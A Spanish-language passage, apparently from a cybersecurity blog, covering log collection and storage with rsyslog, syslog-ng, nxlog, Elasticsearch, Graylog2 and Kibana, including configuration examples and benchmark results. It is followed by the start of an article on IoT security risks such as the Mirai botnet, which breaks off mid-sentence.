mensajes SNMP (mensajes de trampa o de notificación). En el dominio de código abierto, hay herramientas para recibir notificaciones de SNMP y almacenarlas en archivos, como proyectos Net-SNMP y SNMPTT . También hay algunos protocolos específicos de aplicaciones para la transmisión de eventos, por ejemplo, el protocolo rsyslog RELP para la transmisión confiable de mensajes, el protocolo GELF (Graylog Extended Log Format) para el registro estructurado, el protocolo Sourcefire Estreamer para transmitir alarmas IDS con paquetes de carga, etc. ## Técnicas de almacenamiento de registros de eventos ### Almacenamiento de registros en archivos Cuando los registros se recopilan en los servidores centrales, se deben escribir en un almacenamiento permanente, para que el análisis fuera de línea de los eventos pasados se pueda llevar a cabo más adelante. La forma más común de almacenar registros es escribir los mensajes de registro entrantes en archivos planos que residen en el disco del servidor central. Con este enfoque, los archivos de registro separados generalmente se crean registrando el host, la aplicación, el tipo de mensaje o por algún otro criterio, y los archivos de registro a menudo se organizan en alguna estructura de directorio, de modo que se pueda ubicar rápidamente un archivo de registro relevante. Mientras que almacenar mensajes en archivos planos consume poco tiempo de CPU y permite que el servidor log reciba grandes volúmenes de eventos por segundo, buscar eventos relevantes desde archivos planos puede consumir mucho tiempo y recursos. En las redes informáticas actuales, se pueden generar muchos gigabytes de datos de registro cada día, e incluso si estos datos se dividen entre muchos archivos, los archivos individuales aún pueden ser bastante grandes. Como resultado, está más allá de las capacidades humanas revisar esos registros de forma manual, y los eventos interesantes generalmente se pueden identificar solo con búsquedas de expresiones regulares. Por ejemplo, a menudo los administradores del sistema utilizan herramientas online de comandos como egrep o pcregrep para buscar eventos con expresiones regulares. Desafortunadamente, el uso de un lenguaje de expresiones regulares para cada búsqueda individual consume mucha CPU y lleva tiempo. ### Almacenamiento de registros en bases de datos SQL Por las razones indicadas anteriormente, la inserción de mensajes de registro en bases de datos SQL ha sido otro enfoque común para almacenar datos de registro. Sin embargo, insertar un mensaje en una base de datos es considerablemente más costoso que escribirlo en un archivo plano. - En primer lugar, el mensaje debe analizarse y dividirse en campos que corresponden a las columnas de la tabla de la base de datos que contiene los datos de registro. Si el texto del mensaje de registro no está estructurado, dicho análisis se puede hacer a menudo solo con expresiones regulares. - En segundo lugar, la operación de inserción de la base de datos consume mucho más tiempo de CPU que una operación de escritura en un archivo, lo que se hace con una sola llamada al sistema. Sin embargo, el gasto adicional de almacenar datos de registro en una base de datos permite una búsqueda mucho más flexible y eficiente. Además, los nuevos estándares de registro que soportan mensajes de registro estructurados (por ejemplo, el registro sistémico IETF) reducen el costo del análisis sintáctico, ya que el mensaje ya contiene campos claramente definidos. Por lo tanto, muchas soluciones SIEM comerciales están utilizando una base de datos SQL como almacenamiento de eventos primarios. El uso de bases de datos SQL presenta un problema: cada tabla de base de datos contiene un número fijo de columnas, donde cada columna representa un cierto campo de mensaje de un tipo fijo (por ejemplo, entero o cadena). Como consecuencia, los campos de un mensaje de registro deben cumplir con la estructura de una tabla de base de datos que contiene los datos de registro. Para abordar este requisito, los campos de todos los mensajes recopilados deben conocerse con antelación, de modo que se pueda definir el esquema de base de datos apropiado. Por ejemplo, supongamos que el servidor de registro central se utiliza para recopilar alarmas de Snort IDS, con el siguiente ejemplo que representa una alarma entrante en formato de syslog de BSD: <33>Nov 25 17:37:12 ids4 snort[776]: [1:1156:13] WEB-MISC apache directory disclosure attempt [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} 10.2.1.99:41337 -> 192.168.1.1:80 Para almacenar dichas alarmas, se puede configurar una tabla de base de datos de manera sencilla con las siguientes columnas: Marca de tiempo, Nombre de host, SignatureID, SignatureRevision, AlarmText, Clasificación, Prioridad, Transporte, SourceIP, SourcePort, DestinationIP y DestinationPort. Para la alarma de ejemplo anterior, las columnas se llenarán de la siguiente manera: Timestamp="Nov 25 17:37:12"; Hostname="ids4"; SignatureID="1:1156"; SignatureRevision="13"; AlarmText="WEB-MISC apache directory disclosure attempt"; Classification="Attempted Denial of Service"; Priority="2"; Transport="TCP"; SourceIP="10.2.1.99"; SourcePort="41337"; DestinationIP="192.168.1.1"; DestinationPort="80" ### Almacenamiento de registros en bases de datos orientadas a documentos Desafortunadamente, si los registros se reciben de una amplia variedad de fuentes, el entorno cambia constantemente y es probable que aparezcan mensajes de registro en formatos no vistos anteriormente. El uso de bases de datos SQL implica una gran cantidad de trabajo administrativo general, ya que para cada formato de mensaje nuevo se debe configurar un nuevo esquema de análisis. Además, si los mensajes entrantes tienen una gran variedad de campos, es engorroso almacenarlos en la misma tabla de base de datos, ya que la tabla debe tener columnas para todos los campos de mensajes relevantes. Aunque algunas soluciones SIEM definen tablas de bases de datos con un gran número de columnas y dejan varias de ellas para almacenar datos de registro personalizados, este enfoque es, sin embargo, engorroso y no escalable. Para abordar este problema, las bases de datos orientadas a documentos han surgido como soluciones alternativas de almacenamiento de registros durante los últimos 1-2 años. Las bases de datos orientadas a documentos son una categoría importante de bases de datos no SQL que no emplean tablas con columnas predefinidas para almacenar los datos. Aunque las implementaciones de las bases de datos orientadas a documentos varían, se pueden ver como una colección de documentos, donde cada documento suele ser un registro de pares nombre-valor de campo. El motor de base de datos permite buscar documentos almacenados según diversos criterios, por ejemplo recuperar documentos con algunos campos que tienen un cierto valor. Dependiendo de la base de datos, varios formatos como JSON y XML son compatibles con los documentos insertados. Es importante tener en cuenta que cada documento insertado puede tener un conjunto único de nombres de campo que no es necesario conocer con anticipación. Por ejemplo, los siguientes mensajes de registro en formato JSON se pueden almacenar en la misma base de datos: {"timestamp":"Nov 25 17:37:12","host":"ids4","program":"snort","processid":776,"sigid":"1:1156", "revision":13,"alarmtext":"WEB-MISC apache directory disclosure attempt","classification": "Attempted Denial of Service","priority":2,"transport":"TCP","sourceip":"10.2.1.99","sourceport": 41337,"destinationip": "192.168.1.1","destinationport":80} {"timestamp":"Nov 25 17:38:49","host":"myhost","program":"sshd","processid":1022,"messagetext": "Failed password for risto from 10.1.1.1 port 32991 ssh2","username":"risto","sourceip":"10.1.1.1", "sourceport":32991} Durante los últimos 1-2 años, Elasticsearch se ha convertido en uno de los motores de base de datos orientados a documentos más utilizados para almacenar datos de registro. [Imagen: elasticsearch logotipo] Elasticsearch está escrito en Java y se utiliza como backend en varios paquetes populares de administración de registros recientemente creados como Graylog2, Logstash y Kibana. Desde servidores syslog bien establecidos, también es compatible con rsyslog. Elasticsearch acepta nuevos documentos en formato JSON a través de una interfaz HTTP simple, insertando el documento entrante en un índice de base de datos dado y haciendo que el documento pueda buscarse para futuras consultas. Si el índice no existe, se creará automáticamente. Por ejemplo, la siguiente línea de comandos simple de UNIX utiliza la utilidad curl para insertar manualmente el ejemplo anterior de mensaje de registro con formato JSON en la base de datos Elasticsearch local (de forma predeterminada, el servidor acepta nuevos documentos en el puerto TCP 9200). El mensaje de registro se inserta en el registro de sistema del índice, con el tipo de mensaje configurado en ssh y el ID de mensaje establecido en 1: curl -XPUT 'http://localhost:9200/syslog/ssh/1' -d '{"timestamp":"Nov 25 17:38:49","host":"myhost", "program":"sshd","processid":1022,"messagetext": "Failed password for risto from 10.1.1.1 port 32991 ssh2","username":"risto","sourceip":"10.1.1.1", "sourceport":32991}' El soporte para la distribución está integrado en el núcleo de Elasticsearch. Varias instancias de motores Elasticsearch se pueden unir fácilmente en un único clúster, mientras que el descubrimiento automático de nuevos nodos de clúster se implementa a través de la multidifusión de red. Además, cada índice de base de datos se puede dividir en los denominados fragmentos, que pueden ubicarse en diferentes miembros del clúster. Cada índice puede tener una o más réplicas para implementar un clúster tolerante a errores. De forma predeterminada, cada índice se divide en 5 fragmentos y tiene 1 réplica (es decir, 5 fragmentos de réplica). Con la configuración predeterminada, cada índice se puede distribuir a través del clúster de hasta 10 nodos. Muchas tareas administrativas se pueden llevar a cabo a través de la interfaz web de una manera sencilla, como el ejemplo de inserción de mensaje anterior. Por ejemplo, la siguiente línea de comando crea un nuevo índice syslog2 con 10 fragmentos y ninguna réplica: curl -XPUT 'http://localhost:9200/syslog2/' -d '{ "settings" : { "index" : { "number_of_shards":10, "number_of_replicas":0 } } } La siguiente línea de comando cambia la cantidad de réplicas de 0 a 1 para el índice syslog2: curl -XPUT 'http://localhost:9200/syslog2/_settings' -d '{ "number_of_replicas":1 }' ## Servidores Syslog En el apartado anterior, revisamos los protocolos de recopilación de registros y las técnicas de almacenamiento de registros. En esta, veremos los principales servidores syslog de código abierto que implementan todos los tipos del protocolo syslog, y pueden almacenar registros de la forma descrita. Los tres servidores syslog más utilizados en el dominio de código abierto son rsyslog, syslog-ng y nxlog. ### Rsyslog, syslog-ng and nxlog Rsyslog, syslog-ng y nxlog se diseñaron para superar las deficiencias de las implementaciones tradicionales de servidor syslogd de UNIX, que normalmente solo admiten el protocolo syslog BSD basado en UDP, y son capaces de unir y procesar mensajes por instalación y gravedad. Por ejemplo, la siguiente declaración de UNIX syslogd coincidirá con todos los mensajes para el daemon y el recurso del usuario con la advertencia de grave o superior, y almacenará dichos mensajes en el archivo /var/log/warn.log: daemon.warning;user.warning /var/log/warn.log Rsyslog, syslog-ng y nxlog son compatibles no solo con la coincidencia simple de mensajes, sino también con el reconocimiento avanzado de mensajes con expresiones regulares, conversión de mensajes de un formato a otro, comunicaciones autenticadas y encriptadas sobre el protocolo syslog IETF, etc. Para syslog-ng y nxlog. Existen dos versiones separadas: además de una versión de código abierto, también hay una edición comercial con funcionalidad extendida. Rsyslog y syslog-ng se ejecutan en plataformas UNIX, mientras que nxlog también puede funcionar en Windows. La configuración de todos los servidores se almacena en uno o más archivos de configuración de texto. Syslog-ng utiliza un lenguaje de configuración altamente flexible y legible que no es compatible con UNIX syslogd. Las fuentes de mensajes, las condiciones de coincidencia y los destinos se definen con bloques con nombre, siendo cada definición reutilizable en otras partes de la configuración. Syslog-ng también está muy bien documentado, presentando un detallado manual del administrador que consta de cientos de páginas. Esto hace que sea fácil crear configuraciones bastante complejas, incluso para usuarios inexpertos. Rsyslog usa un lenguaje de configuración bastante diferente que admite construcciones syslogd de UNIX. Esto permite una migración fácil de las configuraciones antiguas de syslogd a la plataforma rsyslog. Además de las construcciones syslogd de UNIX, hay muchas características adicionales en el lenguaje de configuración rsyslog. Lamentablemente, con el tiempo, varias sintaxis diferentes se han incluido en el lenguaje que ha introducido incoherencias. Además, rsyslog carece de un completo manual de administrador, y en el sitio web de rsyslog se proporciona un conjunto limitado de ejemplos de configuración que no cubren todos los escenarios de configuración. Afortunadamente, se puede encontrar mucha información de otros sitios web, y rsyslog tiene una lista de correo activa. Funcionalmente, rsyslog admite varias funciones muy útiles que no están presentes en las versiones de código abierto, syslog-ng y nxlog. En primer lugar, es posible configurar el almacenamiento de mensajes temporales en el disco local para los mensajes de registro que no se enviaron correctamente a través de la red. El almacenamiento en búfer se activa cuando se interrumpe la conexión con un par remoto, y cuando el par vuelve a estar disponible, todos los mensajes almacenados en el búfer se retransmiten. En segundo lugar, la última versión estable de rsyslog tiene soporte para la base de datos Elasticsearch. Nxlog usa el lenguaje de configuración de estilo Apache. Al igual que con syslog-ng, las fuentes de mensajes, los destinos y otras entidades se definen con bloques con nombre que les permite reutilizarse fácilmente. Además, nxlog tiene un sólido manual de usuario. Las ventajas de nxlog sobre otros servidores syslog incluyen soporte nativo para la plataforma Windows y el registro de eventos de Windows. Además, nxlog puede aceptar eventos de entrada de varias fuentes que no son compatibles directamente con otros servidores, incluidas bases de datos SQL y archivos de texto en formatos personalizados. Finalmente, nxlog puede generar mensajes de salida en formato GELF, lo que facilita su integración con la solución de visualización de registro Graylog2. Para ilustrar las diferencias entre los lenguajes de configuración de syslog-ng, rsyslog y nxlog, mostramos sentencias de configuración en tres idiomas para el mismo escenario de procesamiento de registros: #### Configuración para syslog-ng @version:3.3 source netmsg { udp(port(514)); }; filter ntpmsg { program('^ntp') and level(warning..emerg); }; destination ntplog { file("/var/log/ntp-faults.log"); }; log { source(netmsg); filter(ntpmsg); destination(ntplog); }; ##### configuration for rsyslog $ModLoad imudp $UDPServerRun 514 if re_match($programname, '^ntp') and $syslogseverity <= 4 then { action(type="omfile" file="/var/log/ntp-faults.log") #### Configuración para nxlog Module im_udp Host Port Exec 0.0.0.0 514 parse_syslog_bsd(); Module om_file File "/var/log/ntp-faults.log" Exec if $SourceName !~ /^ntp/ or $SyslogSeverityValue > 4 drop(); Path netmsg => ntplog %{IP:dstip}(?::%{POSINT:dstport})? Estableciendo los campos de mensaje process_id, signature, alarmtext, proto, srcip, srcport, dstip y dstport. Además de escribir en la base de datos de Elasticsearch, Logstash admite muchas otras salidas, con más de 40 plugins de salida actualmente disponibles. Entre los resultados, se admiten otros sistemas de supervisión y visualización, incluidos Nagios, Zabbix, Loggly, Graphite y Graylog2. Para usar la GUI de Logstash, Logstash debe configurarse para insertar eventos en su base de datos incorporada de Elasticsearch. Con la GUI es posible realizar búsquedas básicas desde mensajes de registro en la base de datos integrada. Desafortunadamente, en comparación con otras herramientas de visualización de registro, la GUI de Logstash tiene una funcionalidad bastante limitada. Sin embargo, dado que Logstash tiene poderosas capacidades de filtrado y conversión de eventos, se usa principalmente como un preprocesador de eventos para diferentes sistemas, incluidos otros sistemas de visualización de registros. ### Graylog2 Graylog2 es un sistema de administración de registros que consta de un servidor basado en Java y una interfaz web escrita en Ruby-on-Rails. El servidor Graylog2 puede recibir mensajes syslog de BSD sobre UDP y TCP, pero también presenta su propio protocolo GELF que facilita el registro estructurado. Además, Graylog2 puede aceptar mensajes syslog y GELF a través del protocolo de mensajería AMPQ. Desafortunadamente, Graylog2 no puede analizar los mensajes syslog estructurados de IETF y reconocer los pares de nombre de campo definidos ya definidos. Para los mensajes syslog de BSD, Graylog2 puede reconocer los campos estándar de Prioridad, Marca de tiempo, Nombre de host y MSG, pero no puede analizar de forma predeterminada el campo de MSG no estructurado. El problema de análisis para mensajes no estructurados puede superarse de varias maneras. En primer lugar, el servidor Graylog2 admite el análisis y la reescritura de mensajes a través de las reglas de Drools Expert y las expresiones regulares. En segundo lugar, dado que Logstash admite conversiones avanzadas entre muchos formatos de mensajes con análisis flexible, muchos sitios usan Logstash para recibir mensajes syslog, analizan campos de mensajes relevantes con filtros grok y finalmente envían los mensajes analizados en formato GELF estructurado a Graylog2. Finalmente, dado que el servidor nxlog syslog es compatible con el protocolo GELF, puede utilizarse como interfaz para recibir mensajes syslog encriptados y de texto sin formato y convertirlos en mensajes estructurados GELF. Para almacenar los mensajes analizados, Graylog2 usa Elasticsearch como su back-end principal (cierta información sobre los mensajes también se almacena en la base de datos MongoDB orientada a documentos, que se utiliza para la creación de gráficos). Desafortunadamente, todos los mensajes de registro se almacenan en un solo índice llamado graylog2, que puede causar problemas de rendimiento ya que muchos mensajes de registro se insertan en el tiempo. Este problema se puede solucionar parcialmente configurando un tiempo de retención de mensajes más corto a través de la interfaz web Graylog2 (de manera predeterminada, los mensajes se mantienen en la base de datos durante 60 días). Sin embargo, sería mucho más eficiente crear un índice separado de Elasticsearch semanal o diariamente (esta última técnica es utilizada por Logstash). Afortunadamente, los desarrolladores de Graylog2 son conscientes de este problema y se supone que se solucionará. [Imagen: Graylog2] Para visualizar los datos de registro recopilados, Graylog2 proporciona una interfaz web completa y bien escrita. Para acceder a la interfaz, se pueden configurar diferentes cuentas de usuario protegidas por contraseña, con cada usuario teniendo derechos completos o limitados (el resto de la discusión se referirá a la interfaz de usuario con todos los derechos de administrador). La interfaz está dividida en varias partes. La vista de mensaje (Como vemos en la imagen) permite obtener una visión general de los mensajes de registro almacenados, presentando los mensajes en un navegador con los mensajes más recientes en primer lugar. En el navegador, se muestran los campos de fecha y hora, host, gravedad, facilidad y texto del mensaje. Al hacer clic en un mensaje individual, se proporciona una vista detallada del mensaje que contiene todos los nombres de campo con valores. Al hacer clic en cada valor individual se realizará una búsqueda de mensajes con el mismo par fieldname-value, y los mensajes descubiertos se mostrarán en el navegador de mensajes principal. La búsqueda de mensajes también se puede iniciar a través de un botón 'Quickfilter' en la vista de mensajes que permite especificar más de una condición de búsqueda. Para buscar un campo de texto de mensaje, se puede usar la sintaxis de consulta de Apache Lucene. Admite búsquedas de cadenas individuales, coincidencia aproximada de cadenas basada en la distancia de Levenshtein, búsquedas de proximidad (por ejemplo, encuentra dos cadenas que tienen hasta 10 palabras intermedias) y combina condiciones de búsqueda individuales con operadores booleanos. Además de ver todos los mensajes, el usuario puede configurar flujos que son colecciones de mensajes que satisfacen algunas condiciones de filtrado de mensajes. Las transmisiones se actualizan con mensajes entrantes coincidentes en tiempo real. Los mensajes debajo de cada flujo se pueden ver por separado, y también es posible configurar umbrales y condiciones de alarma para cada flujo (por ejemplo, enviar una alarma a un administrador de seguridad si han aparecido más de 10 mensajes debajo de la transmisión durante 1 minuto). Para definir una condición de filtrado para una secuencia, los valores del campo del mensaje se pueden comparar con valores fijos, pero en el caso de algunos campos, también con expresiones regulares. Al escribir expresiones regulares para el texto de mensaje coincidente, por convención la expresión debe coincidir con el mensaje completo (por ejemplo, para emparejar mensajes que contienen la cadena 'prueba' en el texto del mensaje, la expresión regular debe escribirse no como prueba, sino como). * prueba. * o ^. * prueba. * $). Además de las transmisiones, Graylog2 también contiene un llamado shell de análisis que admite un lenguaje de consulta flexible para encontrar mensajes individuales y para crear varios informes. Desafortunadamente, actualmente todos los informes están basados en texto, aunque en el futuro se podrían agregar soporte para informes gráficos. Durante el experimentos, se intento establecer el rendimiento de Graylog2 en términos de rendimiento del evento. Esperábamos que el rendimiento de Graylog2 fuera significativamente más lento que el de los servidores syslog probados en la sección anterior. Primero, tanto el servidor Graylog2 como el motor de base de datos Elasticsearch están escritos en Java, mientras que rsyslog, syslog-ng y nxlog están codificados en C. Segundo, el servidor Graylog2 tiene que insertar mensajes de registro en el índice Elasticsearch, lo que requiere mucho más tiempo de CPU que escribir mensajes en archivos planos. Durante las pruebas, se ejecutó Graylog2 en un nodo de Fedora Linux con 8 GB de memoria y un procesador Intel Core i5 650. Se configuró un cliente para Graylog2, que estaba emitiendo una gran cantidad de mensajes syslog BSD sobre TCP. El rendimiento combinado del servidor Graylog2 y el backend Elasticsearch se midió en términos de rendimiento de transmisión de mensajes observado en el lado del cliente. Durante varias pruebas, se pudo alcanzar un rendimiento de 3.500 mensajes por segundo. Esto ilustra que una instancia de servidor Graylog2 no es escalable para entornos muy grandes con muchos miles de hosts de registro y grandes cargas de mensajes. Afortunadamente, los desarrolladores planean agregar soporte en Graylog2 para varias instancias de servidor, lo que debería aumentar sustancialmente su escalabilidad general. ### Kibana [Imagen: Flijo-kibana] Kibana es otra aplicación para visualizar datos de registro recopilados. A diferencia de Graylog2, Kibana consiste únicamente en una interfaz web basada en Ruby que usa Elasticsearch como back-end, y no hay ningún servidor para recibir mensajes de registro en la red y almacenarlos en una base de datos. Por este motivo, Kibana no puede ejecutarse como un sistema independiente, sino que debe usarse con una aplicación que reciba, analize y almacene mensajes de registro en Elasticsearch. Muchos sitios están utilizando Logstash para esta tarea, y la configuración predeterminada de Kibana es compatible con Logstash. Además, Kibana espera que los mensajes de registro en la base de datos Elasticsearch tengan algunos campos creados por Logstash (por ejemplo, @timestamp y @message). Sin embargo, si otra aplicación está configurada para insertar mensajes de registro en la base de datos Elasticsearch con estos pares nombre-valor de campo, Kibana puede trabajar con datos de registro almacenados. Para buscar mensajes de registro, Kibana admite la sintaxis completa de la consulta de Apache Lucene para todos los campos de mensaje. Una ventaja de Kibana sobre Graylog2 es el soporte para la creación de varios informes gráficos. Los informes se pueden crear en función de un campo de mensaje y un marco de tiempo seleccionados, ya sea para todos los mensajes o para algunos criterios de coincidencia de mensajes. Kibana admite la creación de gráficos circulares que reflejan la distribución de valores de campo, informes de análisis de tendencias e informes de recuento de valores de campo. Al seleccionar algún valor del formulario de informe, el usuario puede ir a los mensajes de registro relevantes. Los informes también se pueden crear directamente desde las búsquedas, por ejemplo, la consulta @ fields.srcip = 10.1.1. selecciona todos los mensajes donde el campo @ fields.srcip (dirección IP de origen) tiene el valor 10.1.1.1, mientras que la consulta: @fields.srcip=10.1.1.1 | terms @fields.dstip crea un gráfico circular sobre la distribución de los valores de @ fields.dstip (dirección IP de destino) para la fuente IP 10.1.1.1. [Imagen: Kibana dashboard] Como rsyslog tiene soporte para Elasticsearch desde 2012, se puede usar en lugar de Logstash para recibir y preparar datos de registro para Kibana. Las siguientes declaraciones de configuración rsyslog logran una puerta de enlace simple entre los mensajes syslog de BSD y Elasticsearch: $ModLoad /usr/local/lib/rsyslog/omelasticsearch.s $template Syslog2Json, "{\"@timestamp\":\"%timereported:::date-rfc3339%\", \"@message\":\"%msg:::json%\",\"@source\":\"unknown\",\"@type\":\"syslog\",\"@tags\":[], \"@fields\":{\"receptiontime\":\"%timegenerated:::date-rfc3339%\", \"host\":\"%HOSTNAME:::json%\",\"tag\":\"%syslogtag:::json%\"}} $template SyslogIndex, "rsyslog-%timereported:1:10:date-rfc3339%" daemon.* action(type="omelasticsearch" template="Syslog2Json" dynSearchIndex="on" searchIndex="SyslogIndex" server="localhost" bulkmode="on") La primera instrucción carga el módulo de salida Elasticsearch para rsyslog. La segunda declaración define una plantilla llamada Syslog2Json, que convierte el mensaje de syslog de BSD al formato JSON. Los valores entre signos de porcentaje, como reportados en el tiempo, denotan campos extraídos del mensaje syslog, mientras que el sufijo ::: date date-rfc3339 convierte la marca de tiempo dada en formato RFC3339. Además, el sufijo ::: json después del nombre del campo significa que el campo está hecho compatible con JSON (por ejemplo, las comillas dobles deben escaparse con una barra diagonal inversa, ya que se utilizan como delimitadores en los registros JSON). El tercer extracto define un índice separado de Elasticsearch para cada día, que tiene el formato rsyslog-YYYY-MM-DD (por ejemplo, rsyslog- 2012-12-02). La cuarta instrucción coincide con todos los mensajes con la función daemon y los inserta en el índice syslog-YYYY-MM-DD de la base de datos Elasticsearch local. La declaración bulkmode = "on" habilita las inserciones masivas: en lugar de insertar cada mensaje de registro por separado, se inserta un mayor número de mensajes en un lote con una única operación de inserción que aumenta significativamente el rendimiento del mensaje. Para evaluar el rendimiento de Logstash y rsyslog, se instalo Kibana con Elasticsearch en un nodo de Fedora Linux con 8 GB de memoria y un procesador Intel Core i5 650, y configuramos tanto rsyslog como Logstash en este nodo. Ambas soluciones se configuraron para insertar mensajes en Elasticsearch en modo bulk (para rsyslog, el tamaño del lote del mensaje era 16, mientras que para Logstash se usó un tamaño de lote de 100). Para la evaluación del rendimiento, se envio 100.000 mensajes syslog BSD sobre TCP al receptor, y medimos el tiempo de procesamiento de estos mensajes. Al final de cada prueba, se realizó una consulta a Elasticsearch para verificar que todos los mensajes estuviesen insertados correctamente en la base de datos. Se repitio esta prueba 100 veces para rsyslog y Logstash, eliminando todos los mensajes insertados entre ejecuciones de prueba consecutivas. Los resultados del experimento se presenta en la tabla. Para rsyslog, 100.000 mensajes se procesaron en un promedio de 17.066 segundos, produciendo una velocidad de procesamiento promedio de 5859.6 mensajes por segundo. En el caso de Logstash, la velocidad de procesamiento promedio fue de 1732.952 mensajes por segundo. En otras palabras, rsyslog puede insertar mensajes en Elasticsearch más de 3 veces más rápido que Logstash. [Imagen: rsyslog-elasticsearch] Durante la prueba, también descubrimos una característica molesta de Logstash: para inserciones masivas, los mensajes se acumulan en un búfer que se vacía solo cuando está lleno. Por lo tanto, los mensajes de registro pueden permanecer en el búfer durante largos períodos de tiempo si el búfer aún contiene algo de espacio libre. Por el contrario, rsyslog implementa un algoritmo de inserción masiva más eficiente que no deja mensajes sin procesar pendientes en la memoria. --- # Recomendaciones de ciberseguridad en IoT URL: https://ciberseguridad.blog/recomendaciones-de-ciberseguridad-en-iot/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-06-03 Actualizado: 2026-10-04 Tema: Internet de las cosas > Los dispositivos IoT están en el foco de la ciberseguridad. En este post trataremos algunas recomendaciones de seguridad en IoT. ! CONÓCELAS ¡ Esta revisión se centra en cómo podemos garantizar que los productos conectados a Internet para el consumidor y los servicios asociados sean seguros. En particular, analiza los derechos y responsabilidades de los consumidores y la industria. El Internet of Things (IoT) ofrece enormes oportunidades para los ciudadanos, así como para la economía digital de los paises. Esto incluye el aumento de funcionalidades de muchas características en el hogar, tales como cambiar de forma remota el nivel de calefacción o la iluminación. Sin embargo, muchos dispositivos conectados a internet que se venden a los consumidores carecen incluso de las disposiciones básicas de seguridad cibernética. Esto, junto con la rápida proliferación de estos dispositivos, ha llevado principalmente a dos riesgos: 1. La seguridad del consumidor, la privacidad y la seguridad está siendo socavada por la vulnerabilidad de los dispositivos individuales. 2. La economía en general se enfrenta a una creciente amenaza de ataques informáticos a gran escala lanzados desde grandes volúmenes de dispositivos inseguros. Estos riesgos deben abordarse a través de la acción conjunta del lado de expertos en ciberseguridad y la industria como una cuestión urgente. Este post expone la necesidad de una mayor acción, y propone una serie de medidas para proteger mejor a los ciudadanos y la economía en general. El informe señala que los consumidores necesitan un cambio fundamental en el enfoque de la industria para gestionar los riesgos de ciberseguridad. Es necesario alejarse del lado de los consumidores y configurar los dispositivos de forma segura. La propuesta enmarcada en este post, insiste y se centra en estimular el diálogo con la industria IoT, las instituciones académicas y la sociedad civil. La seguridad de IoT es un desafío global que requiere colaboración global. ## Internet de las cosas (IoT): nuevas oportunidades y riesgos para los consumidores ### Beneficios del IoT El crecimiento de IoT ya ha traído importantes beneficios económicos y sociales. A medida que continúan los desarrollos, se espera que haya más beneficios para los consumidores y las empresas por igual, por ejemplo: - Productos y servicios nuevos y mejores - Compañías que usan datos para anticipar y satisfacer mejor las necesidades de las personas - Empresas que brindan información útil y personalizada para informar a los consumidores sobre la toma de decisiones y las características para ahorrarles tiempo y dinero a las personas, por ejemplo, en energía y seguridad del hogar. Junto con los productos y servicios conectados al consumidor, el IoT también se está poniendo de uso en industrias, como en los sectores de agricultura y el sector automotriz. El IoT también se está utilizando en el sector público, incluida la salud, la atención social, la infraestructura urbana y los servicios comunitarios. El crecimiento de los mercados de IoT brinda grandes oportunidades para las empresas. En 2016, los sectores digitales contribuyeron con aproximadamente 500 mil millones de euros. La cantidad de dispositivos conectados a Internet sigue aumentando. Las previsiones varían, pero algunos sugieren que habrá un estimado de 20 mil millones de dispositivos conectados a Internet en todo el mundo en 2020. Además, la propiedad en España de dispositivos inteligentes podría aumentar de aproximadamente diez a quince dispositivos por hogar para 2020. Las redes y los datos que fluyen de los dispositivos conectados también admitirán una gama extraordinaria de aplicaciones y oportunidades económicas. Este aumento esperado en dispositivos IoT enfatiza la necesidad de un enfoque proporcionado y colaborativo para asegurar que la industria adopten el IoT del consumidor, y apoye y fomente la innovación. ### Riesgos asociados con el consumo de IoT [Imagen: Internet_de_las_Cosas_Exponencial] Si bien el crecimiento reciente en IOT ofrece oportunidades, también trae riesgos. Es importante señalar que las vulnerabilidad que los delincuentes cibernéticos encuentran, pueden explotarse a escala, las múltiples víctimas pueden sentir el impacto a través de las fronteras geográficas. Encontraremos principalmente dos riesgos clave asociados con el IoT del consumidor. - En primer lugar, los productos de IoT mal asegurados y los servicios asociados amenazan la seguridad, privacidad y seguridad online de las personas. - En segundo lugar, los dispositivos con seguridad débil pueden formar parte de ataques cibernéticos a gran escala, como los ataques de Denegación distribuida de servicios (DDoS). El impacto de tales ataques se siente predominantemente por terceros y puede repercutir en las empresas o incluso paises y, de hecho, en la economía mundial. Cuando se aprovechan los fallos de seguridad en los dispositivos, los servicios comprometidos pueden causar problemas importantes. Un dispositivo con un micrófono o cámara podría usarse para registrar información dentro de tu hogar, o la información sobre tu rutina diaria podría ser utilizada para explotar, acosar o chantajearte. Algunos productos IoT están diseñados para problemas de seguridad de los niños, como las grabaciones de voz y las imágenes, que se consideran privadas, se encontrarán abiertas al público y accesibles para quienes deseen acceder a ellas. Un dispositivo comprometido conectado a la calefacción doméstica o a los electrodomésticos también puede causar riesgos de seguridad, como que un atacante pueda deshabilitar los controles de seguridad o denegar el uso, como la interrupción de los sistemas de calefacción durante el invierno. Alternativamente, si se bloquean las cerraduras inteligentes o los sistemas de control de acceso físico conectados, los delincuentes podrían ingresar a los hogares sin necesidad de forzar la entrada. La naturaleza de Internet es tal que cualquier ataque podría realizarse a escala local, nacional o incluso internacional. Si los router domésticos son el objetivo, un ataque podría dejar muchas personas sin conectividad a internet. Si se encuentra una vulnerabilidad en un producto de asistente doméstico, una violación en la privacidad del consumidor podría ser significativamente más catastrófica: los delincuentes podrían obtener un audio en vivo en un gran número de hogares. Los ataques generalizados contra los dispositivos de IoT no son un concepto teórico, ya son una realidad. Esto se ilustra con el malware Mirai, que se descubrió en 2016 y que apuntaba a dispositivos como cámaras habilitadas para Internet (cámaras IP) y otros productos IoT. Estos ataques tuvieron éxito porque el malware de Mirai usaba credenciales predeterminadas comunes (como un nombre de usuario y contraseña establecidos por el "administrador") y una configuración deficiente de los dispositivos. [Imagen: Passwords-Mirai] Estas debilidades se identifican con frecuencia en los productos IoT. En el caso de Mirai, los dispositivos comprometidos se agruparon como una red (conocida como botnet), controlada por un atacante y utilizada para lanzar ataques DDoS contra otros dispositivos y servicios conectados a Internet, incluso contra la empresa francesa cloud OVH, y la compañía que da servicios de internet a Netflix, GitHub y Twitter. [Imagen: mirai-botnet] Mirai proporciona un ejemplo de los dispositivos de IoT que son atacados y utilizados por un atacante para posibles objetivos finales adversos, como la interrupción a gran escala de los servicios de Internet en todo el mundo. En octubre de 2017 una evolución de Mirai, llamado Reaper, se descubrió que a diferencia de Mirai utiliza públicamente y fácilmente dispositivos disponibles. El exploits Reaper pone de relieve las debilidades dentro de la industria de IOT alrededor de parchear las vulnerabilidades de seguridad conocidas, lo que permite a los atacantes utilizarlo para causar daño. A menudo, el parche se ha basado en la intervención manual de un usuario, un archivo de actualización que se copiará directamente en el dispositivo. Otros casos han estado involucrados en el desarrollo del sistema. Los defectos de seguridad son utilizados por ataques cómo Mirai y Reaper IoT, encontrando varios casos en los que se han descubierto vulnerabilidades de seguridad dentro del servicio web o la 